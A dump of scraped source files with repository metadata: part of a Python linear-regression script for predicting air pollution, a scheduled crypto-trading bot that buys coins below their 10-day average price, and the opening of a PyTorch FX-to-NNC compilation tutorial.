xd_4.insert(i,int(lstpm[i][4]))
xd_5.insert(i,int(lstpm[i][5]))
xd_6.insert(i,int(lstpm[i][6]))
xd_7.insert(i,int(lstpm[i][7]))
xd_8.insert(i,int(lstpm[i][8]))
xd10_0.insert(i,float(lstpmSO[i][8]))
xd10_1.insert(i,float(lstpmSO[i][7]))
xd10_2.insert(i,float(lstpmSO[i][6]))
xd10_3.insert(i,float(lstpmSO[i][6]))
xd10_4.insert(i,float(lstpmO3[i][7]))
xd10_5.insert(i,float(lstpmO3[i][8]))
xd10_6.insert(i,float(lstpmCO[i][8]))
xd10_7.insert(i,float(lstpmCO[i][7]))
xd10_8.insert(i,float(lstpmCO[i][6]))
xd10_9.insert(i,float(lstpmCO[i][6]))
xd10_10.insert(i,float(lstpmWD[i][7]))
xd10_11.insert(i,float(lstpmWD[i][8]))
yd.insert(i,int(lstpm[i][9]))
i+=1
# print yd
b = 0.1
w0 = 0.1
w1 = 0.1
w2 = 0.1
w3 = 0.1
w4 = 0.1
w5 = 0.1
w6 = 0.1
w7 = 0.1
w8 = 0.1
w00 = 0.1
w01 = 0.1
w02 = 0.1
w03 = 0.1
w04 = 0.1
w05 = 0.1
w06 = 0.1
w07 = 0.1
w08 = 0.1
w09 = 0.1
w10 = 0.1
w11 = 0.1
lr = 0.5
b_history = [b]
w0_history = [w0]
w1_history = [w1]
w2_history = [w2]
w3_history = [w3]
w4_history = [w4]
w5_history = [w5]
w6_history = [w6]
w7_history = [w7]
w8_history = [w8]
w00_history = [w00]
w01_history = [w01]
w02_history = [w02]
w03_history = [w03]
w04_history = [w04]
w05_history = [w05]
w06_history = [w06]
w07_history = [w07]
w08_history = [w08]
w09_history = [w09]
w10_history = [w10]
w11_history = [w11]
iteration = 5000
b_lr = 0
w0_lr = 0
w1_lr = 0
w2_lr = 0
w3_lr = 0
w4_lr = 0
w5_lr = 0
w6_lr = 0
w7_lr = 0
w8_lr = 0
w00_lr = 0
w01_lr = 0
w02_lr = 0
w03_lr = 0
w04_lr = 0
w05_lr = 0
w06_lr = 0
w07_lr = 0
w08_lr = 0
w09_lr = 0
w10_lr = 0
w11_lr = 0
b_grad_n = 0.0
w0_grad_n = 0.0
w1_grad_n = 0.0
w2_grad_n = 0.0
w3_grad_n = 0.0
w4_grad_n = 0.0
w5_grad_n = 0.0
w6_grad_n = 0.0
w7_grad_n = 0.0
w8_grad_n = 0.0
w00_grad_n = 0.0
w01_grad_n = 0.0
w02_grad_n = 0.0
w03_grad_n = 0.0
w04_grad_n = 0.0
w05_grad_n = 0.0
w06_grad_n = 0.0
w07_grad_n = 0.0
w08_grad_n = 0.0
w09_grad_n = 0.0
w10_grad_n = 0.0
w11_grad_n = 0.0
rate = 0.3
for r in range(iteration):
b_grad = 0.0
w0_grad = 0.0
w1_grad = 0.0
w2_grad = 0.0
w3_grad = 0.0
w4_grad = 0.0
w5_grad = 0.0
w6_grad = 0.0
w7_grad = 0.0
w8_grad = 0.0
w00_grad = 0.0
w01_grad = 0.0
w02_grad = 0.0
w03_grad = 0.0
w04_grad = 0.0
w05_grad = 0.0
w06_grad = 0.0
w07_grad = 0.0
w08_grad = 0.0
w09_grad = 0.0
w10_grad = 0.0
w11_grad = 0.0
for n in range(len(xd_0)):
b_grad = b_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*1.0
w0_grad = w0_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_0[n]
w1_grad = w1_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_1[n]
w2_grad = w2_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_2[n]
w3_grad = w3_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_3[n]
w4_grad = w4_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_4[n]
w5_grad = w5_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_5[n]
w6_grad = w6_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_6[n]
w7_grad = w7_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_7[n]
w8_grad = w8_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_8[n]
w00_grad = w00_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_0[n]
w01_grad = w01_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_1[n]
w02_grad = w02_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_2[n]
w03_grad = w03_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_3[n]
w04_grad = w04_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_4[n]
w05_grad = w05_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_5[n]
w06_grad = w06_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_6[n]
w07_grad = w07_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_7[n]
w08_grad = w08_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_8[n]
w09_grad = w09_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_9[n]
w10_grad = w10_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_10[n]
w11_grad = w11_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_11[n]
b_lr = b_lr + b_grad**2
w0_lr = w0_lr + w0_grad**2
w1_lr = w1_lr + w1_grad**2
w2_lr = w2_lr + w2_grad**2
w3_lr = w3_lr + w3_grad**2
w4_lr = w4_lr + w4_grad**2
w5_lr = w5_lr + w5_grad**2
w6_lr = w6_lr + w6_grad**2
w7_lr = w7_lr + w7_grad**2
w8_lr = w8_lr + w8_grad**2
w00_lr = w00_lr + w00_grad**2
w01_lr = w01_lr + w01_grad**2
w02_lr = w02_lr + w02_grad**2
w03_lr = w03_lr + w03_grad**2
w04_lr = w04_lr + w04_grad**2
w05_lr = w05_lr + w05_grad**2
w06_lr = w06_lr + w06_grad**2
w07_lr = w07_lr + w07_grad**2
w08_lr = w08_lr + w08_grad**2
w09_lr = w09_lr + w09_grad**2
w10_lr = w10_lr + w10_grad**2
w11_lr = w11_lr + w11_grad**2
b = b -lr/np.sqrt(b_lr) * b_grad #- rate * b_grad_n
w0 = w0 -lr/np.sqrt(w0_lr) * w0_grad - rate * w0_grad_n
# print w0
# print w0_grad
# print w0_grad_n
w1 = w1 -lr/np.sqrt(w1_lr) * w1_grad - rate * w1_grad_n
w2 = w2 -lr/np.sqrt(w2_lr) * w2_grad - rate * w2_grad_n
w3 = w3 -lr/np.sqrt(w3_lr) * w3_grad - rate * w3_grad_n
w4 = w4 -lr/np.sqrt(w4_lr) * w4_grad - rate * w4_grad_n
w5 = w5 -lr/np.sqrt(w5_lr) * w5_grad - rate * w5_grad_n
w6 = w6 -lr/np.sqrt(w6_lr) * w6_grad - rate * w6_grad_n
w7 = w7 -lr/np.sqrt(w7_lr) * w7_grad - rate * w7_grad_n
w8 = w8 -lr/np.sqrt(w8_lr) * w8_grad - rate * w8_grad_n
w00 = w00 -lr/np.sqrt(w00_lr) * w00_grad - rate * w00_grad_n
w01 = w01 -lr/np.sqrt(w01_lr) * w01_grad - rate * w01_grad_n
w02 = w02 -lr/np.sqrt(w02_lr) * w02_grad - rate * w02_grad_n
w03 = w03 -lr/np.sqrt(w03_lr) * w03_grad - rate * w03_grad_n
w04 = w04 -lr/np.sqrt(w04_lr) * w04_grad - rate * w04_grad_n
w05 = w05 -lr/np.sqrt(w05_lr) * w05_grad - rate * w05_grad_n
w06 = w06 -lr/np.sqrt(w06_lr) * w06_grad - rate * w06_grad_n
w07 = w07 -lr/np.sqrt(w07_lr) * w07_grad - rate * w07_grad_n
w08 = w08 -lr/np.sqrt(w08_lr) * w08_grad - rate * w08_grad_n
w09 = w09 -lr/np.sqrt(w09_lr) * w09_grad - rate * w09_grad_n
w10 = w10 -lr/np.sqrt(w10_lr) * w10_grad - rate * w10_grad_n
w11 = w11 -lr/np.sqrt(w11_lr) * w11_grad - rate * w11_grad_n
b_history.append(b)
w0_history.append(w0)
w1_history.append(w1)
w2_history.append(w2)
w3_history.append(w3)
w4_history.append(w4)
w5_history.append(w5)
w6_history.append(w6)
w7_history.append(w7)
w8_history.append(w8)
w00_history.append(w00)
w01_history.append(w01)
w02_history.append(w02)
w03_history.append(w03)
w04_history.append(w04)
w05_history.append(w05)
w06_history.append(w06)
w07_history.append(w07)
w08_history.append(w08)
w09_history.append(w09)
w10_history.append(w10)
w11_history.append(w11)
b_grad_n = b_grad
w0_grad_n = lr/np.sqrt(w0_lr) * w0_grad
w1_grad_n = lr/np.sqrt(w1_lr) * w1_grad
w2_grad_n = lr/np.sqrt(w2_lr) * w2_grad
w3_grad_n = lr/np.sqrt(w3_lr) * w3_grad
w4_grad_n = lr/np.sqrt(w4_lr) * w4_grad
w5_grad_n = lr/np.sqrt(w5_lr) * w5_grad
w6_grad_n = lr/np.sqrt(w6_lr) * w6_grad
w7_grad_n = lr/np.sqrt(w7_lr) * w7_grad
w8_grad_n = lr/np.sqrt(w8_lr) * w8_grad
w00_grad_n = lr/np.sqrt(w00_lr) * w00_grad
w01_grad_n = lr/np.sqrt(w01_lr) * w01_grad
w02_grad_n = lr/np.sqrt(w02_lr) * w02_grad
w03_grad_n = lr/np.sqrt(w03_lr) * w03_grad
w04_grad_n = lr/np.sqrt(w04_lr) * w04_grad
w05_grad_n = lr/np.sqrt(w05_lr) * w05_grad
w06_grad_n = lr/np.sqrt(w06_lr) * w06_grad
w07_grad_n = lr/np.sqrt(w07_lr) * w07_grad
w08_grad_n = lr/np.sqrt(w08_lr) * w08_grad
w09_grad_n = lr/np.sqrt(w09_lr) * w09_grad
w10_grad_n = lr/np.sqrt(w10_lr) * w10_grad
w11_grad_n = lr/np.sqrt(w11_lr) * w11_grad
#print w01
# file = open(sys.argv[2],'r')
with open(sys.argv[2],'r') as csvfile:
reader = csv.reader(csvfile)
lstpm1=[]
lstpm110=[]
lstpmO3=[]
lstpmNO2=[]
lstpmCO=[]
lstpmWD=[]
for row1 in reader :
if row1[1] =='PM2.5' :
lstpm1.append(row1[2:27])
if row1[1] =='SO2' :
lstpm110.append(row1[2:27])
if row1[1] =='O3' :
lstpmO3.append(row1[2:27])
if row1[1] =='PM10' :
lstpmO2.append(row1[2:27])
if row1[1] =='CO' :
lstpmCO.append(row1[2:27])
if row1[1] =='WIND_SPEED' :
lstpmWD.append(row1[2:27])
# print lstpm110[1]
xd_0 = []
xd_1 = []
xd_2 = []
xd_3 = []
xd_4 = []
xd_5 = []
xd_6 = []
xd_7 = []
xd_8 = []
xd_00 = []
xd_01 = []
xd_02 = []
xd_03 = []
xd_04 = []
xd_05 = []
xd_06 = []
xd_07 = []
xd_08 = []
xd_09 = []
xd_10 = []
xd_11 = []
y_out = []
y_num = []
y=0
q=0
yy=[]
while q < len(lstpm1) :
xd_0.insert(q,int(lstpm1[q][0]))
xd_1.insert(q,int(lstpm1[q][1]))
xd_2.insert(q,int(lstpm1[q][2]))
xd_3.insert(q,int(lstpm1[q][3]))
xd_4.insert(q,int(lstpm1[q][4]))
xd_5.insert(q,int(lstpm1[q][5]))
xd_6.insert(q,int(lstpm1[q][6]))
xd_7.insert(q,int(lstpm1[q][7]))
xd_8.insert(q,int(lstpm1[q][8]))
xd_00.insert(q,float(lstpm110[q][8]))
xd_01.insert(q,float(lstpm110[q][7]))
xd_02.insert(q,float(lstpm110[q][6]))
xd_03.insert(q,float(lstpm110[q][5]))
xd_04.insert(q,float(lstpmO3[q][7]))
xd_05.insert(q,float(lstpmO3[q][8]))
xd_06.insert(q,float(lstpmCO[q][8]))
xd_07.insert(q,float(lstpmCO[q][7]))
xd_08.insert(q,float(lstpmCO[q][6]))
xd_09.insert(q,float(lstpmCO[q][5]))
xd_10.insert(q,float(lstpmWD[q][7]))
xd_11.insert(q,float(lstpmWD[q][8]))
q+=1
id = ['id','value']
f= open(sys.argv[3],'w')
w=csv.writer(f)
w.writerow(id)
for n in range(len(xd_0)):
y = b + w0*xd_0[n] + w1*xd_1[n] + w2*xd_2[n] + w3*xd_3[n] + w4*xd_4[n] + w5*xd_5[n] + w6*xd_6[n] + w7*xd_7[n] + w8*xd_8[n]+ w00*xd_00[n] + w01*xd_01[n] + w02*xd_02[n] + w03*xd_03[n] + w04*xd_04[n] + w05*xd_05[n] + w06*xd_06[n] + w07*xd_07[n] + w08*xd_08[n] + w09*xd_09[n] + w10*xd_10[n] + w11*xd_11[n]
y_out.insert(n,y)
y_num.insert(n,'id_'+str(n))
# print y_out
# w.writerows('id_')
w.writerows(zip(y_num,y_out))
f.close()
f = open('golden.csv','r')
golden =[]
for row in csv.reader(f) :
golden.append(int(row[0]))
q=0
dd=0
while q < len(golden) :
c= y_out[q] - golden[q]
d=c**2
dd =dd+d
q+=1
a=dd/len(golden)
a1 =np.sqrt(a)
print(a1)
|
[
"r05943050@ntu.edu.tw"
] |
r05943050@ntu.edu.tw
|
3008ef32988f2717ddbbec18bb8430ee924116d1
|
e01ec3863eae8401b33f0d2e8e043361fc625bb2
|
/app.py
|
a91837a604de44bd8afc6ae45a49f17703cc43a4
|
[] |
no_license
|
pavantej934/pgny-interview-assessment_solution
|
4bed328c9e835f7ca97a63f1e0b663e5897b52cb
|
1db3496e79d0127c408bf24dd8ed6904017c8ed0
|
refs/heads/main
| 2023-06-29T08:23:54.153875
| 2021-07-23T12:24:58
| 2021-07-23T12:24:58
| 388,792,693
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,344
|
py
|
"""Crypto Interview Assessment Module."""
from dotenv import find_dotenv, load_dotenv
import crypto_api
from typing import Dict, List
from models import CoinHistory, DBSession
from apscheduler.schedulers.blocking import BlockingScheduler
from logger import Logger
load_dotenv(find_dotenv(raise_error_if_not_found=True))
class CryptoTrading:
def __init__(self):
self.__top_n_coins = 3
self.__past_x_days = 10
self.__order_qty = 1
self.__db_session = DBSession().create_db_session()
self.__logger = Logger()
def __get_coin_data(self) -> List[Dict]:
"""Gets coin prices for top_n_coins by market cap"""
coins = crypto_api.get_coins()
n = self.__top_n_coins
top_n_coins = []
for i in range(n):
coin = coins[i]
top_n_coins.append({'id': coin['id'],
'symbol': coin['symbol'],
'name': coin['name'],
'price': coin['current_price']})
return top_n_coins
def __get_coin_price(self, coin_id: str) -> float:
"""Gets the avg price of coin_id averaged over past_x_days"""
coin_prices = crypto_api.get_coin_price_history(coin_id=coin_id)
x_days = self.__past_x_days
sum_price = 0
for price in coin_prices:
sum_price += price[1]
avg_price = sum_price / x_days
return avg_price
def __place_order(self, coin_id: str, quantity: int, price: float) -> bool:
"""Places an order for coin_id at price for quantity no. of coins"""
bid_price = crypto_api.submit_order(coin_id=coin_id, quantity=quantity, bid=price)
return bid_price
def __save_coin_to_db(self, coin: CoinHistory) -> bool:
"""Saves coin object to database"""
self.__db_session.add(coin)
self.__db_session.commit()
return True
def __get_portfolio(self, top_3_coins):
"""Gets the total portfolio of coins owned"""
##TODO: Cache the current results so that next time computation will be on top of current results
query = "SELECT symbol, SUM(quantity), AVG(price) FROM crypto.coin_history WHERE bought=1 GROUP BY symbol;"
portfolio = self.__db_session.execute(query)
computed_portfolio = []
for position in portfolio:
symbol = position[0]
quantity = int(position[1])
avg_buy_price = position[2]
pct_profit = 0
for coin in top_3_coins:
if position[0] == coin['symbol']:
pct_profit = (coin['price'] - avg_buy_price) / avg_buy_price
pct_profit = round(pct_profit * 100, 2)
computed_portfolio.append((symbol, quantity, round(avg_buy_price, 3), pct_profit))
self.__logger.log('***********Current Portfolio***********')
#self.__logger.log('(Symbol | Qty Bought | Avg Buy Price | Pct Profit)')
for comp_position in computed_portfolio:
self.__logger.log(f"Bought {comp_position[1]} coin/s of {comp_position[0]} at average price of {comp_position[2]}, percentage profit made {comp_position[3]}")
self.__logger.log('***************************************')
def crypto_trader(self):
"""Trading module, places trades as per rules"""
#get top 3 coins by market cap
top_3_coins = self.__get_coin_data()
for coin in top_3_coins:
bought=False
#get avg price of coin over last 10 days
avg_price = self.__get_coin_price(coin_id = coin['id'])
curr_price = coin['price']
if curr_price < avg_price:
#place order for 1 coin since current price < average price (quantity must be set before placing the order)
quantity = self.__order_qty
bid_price = self.__place_order(coin_id=coin['id'], quantity=quantity, price=curr_price)
bought = True
#log the trade
self.__logger.log(f"Trade made for {coin['name']} at {bid_price}, bought {quantity} coin/s")
else:
quantity = 0
bid_price=curr_price
#create a coin obj and save to db
coin_obj = CoinHistory().create_coin(symbol=coin['symbol'],
name=coin['name'],
price=bid_price,
bought=bought,
quantity=quantity)
if self.__save_coin_to_db(coin_obj):
self.__logger.log(msg=f"Successfully saved {coin['name']} to db", console=False)
#log the current portfolio
self.__get_portfolio(top_3_coins)
if __name__ == '__main__':
scheduler = BlockingScheduler()
cryptotrader = CryptoTrading()
logger = Logger()
@scheduler.scheduled_job('interval', minutes=60)
def trader():
cryptotrader.crypto_trader()
logger.log('Hello! Welcome to crypto trading..')
logger.log('At any point, press Ctrl+C to quit the application')
trader()
try:
scheduler.start()
except (KeyboardInterrupt, SystemExit):
scheduler.shutdown()
logger.log('End of crypto trading for now.. Good bye!')
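# (Added note, not part of the original module.) The trading rule implemented in
# crypto_trader above: for each of the top 3 coins by market cap, buy 1 coin at the
# current price whenever the current price is below the 10-day average; every check
# is recorded as a CoinHistory row, and the scheduled job repeats every 60 minutes.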
|
[
"noreply@github.com"
] |
pavantej934.noreply@github.com
|
80902bc88c6d5184d3535b8a40505c90ad41926c
|
cd78df2acbaade63ea74a63ba9ebfbed17566d96
|
/fx/nnc_compile.py
|
5a604ab9f37aab1c3eeedb40f26842fd7e78bc93
|
[
"BSD-3-Clause"
] |
permissive
|
brianjo/examples
|
7993ca7491957385447c15630a789ce5d56eeabb
|
0cb38ebb1b6e50426464b3485435c0c6affc2b65
|
refs/heads/main
| 2022-03-26T06:47:57.840639
| 2022-03-17T16:10:20
| 2022-03-17T16:10:20
| 472,915,034
| 1
| 0
|
BSD-3-Clause
| 2022-03-22T19:47:47
| 2022-03-22T19:47:46
| null |
UTF-8
|
Python
| false
| false
| 17,722
|
py
|
# This example is provided only for explanatory and educational purposes. The
# underlying APIs may change and this tutorial may break.
# Compiling FX models to NNC (Neural Network Compiler)
######################################################
# The goal of this file is to demonstrate an end to end example of using FX to
# lower a PyTorch model to a backend codegen compiler. In this example, we will
# be using NNC
# (https://github.com/pytorch/pytorch/blob/master/test/cpp/tensorexpr/tutorial.cpp).
# If you're unfamiliar with NNC, the general design is strongly inspired by TVM
# and Halide.
#
# To do so, this example contains two FX transformations.
# The first one is a decomposition pass that normalizes and decomposes PyTorch
# operations (such as addmm). Using a pass like this allows us to reduce the
# number of lowerings we need to write. Instead of needing to specifically
# write a lowering for addmm, we can decompose addmm and lower its constituent
# operations.
# The second one is the actual lowering pass itself. In this case, we will need
# to convert each PyTorch operation we encounter into the corresponding NNC
# `TensorExpr`.
#
# These two passes, `decompose` and `nnc_compile`, are fairly similar.
# In both cases, we re-interpret each operation in the FX graph to construct an
# entirely new representation. In the decomposition pass, we either copy the
# operation as-is into the new graph, or we use `Proxy` objects to decompose
# the operation. This is an extension of the example presented here:
# https://pytorch.org/docs/master/fx.html#proxy-retracing
#
# In the lowering pass, a similar principle applies. However, instead of using
# `Proxy` objects to rewrite our op in other PyTorch ops, we do the translation
# ourselves. In addition, since this is not a source-to-source transformation,
# we return a somewhat hacky function that passes in the module attributes to
# the NNC callable.
#
# Results
######################################
# Using NNC (which compiles directly to LLVM), we can compile a fairly small
# PyTorch model and compare performance between NNC, PyTorch Eager, and Static
# Runtime. These are my results on an Intel i7-8750H CPU.
#
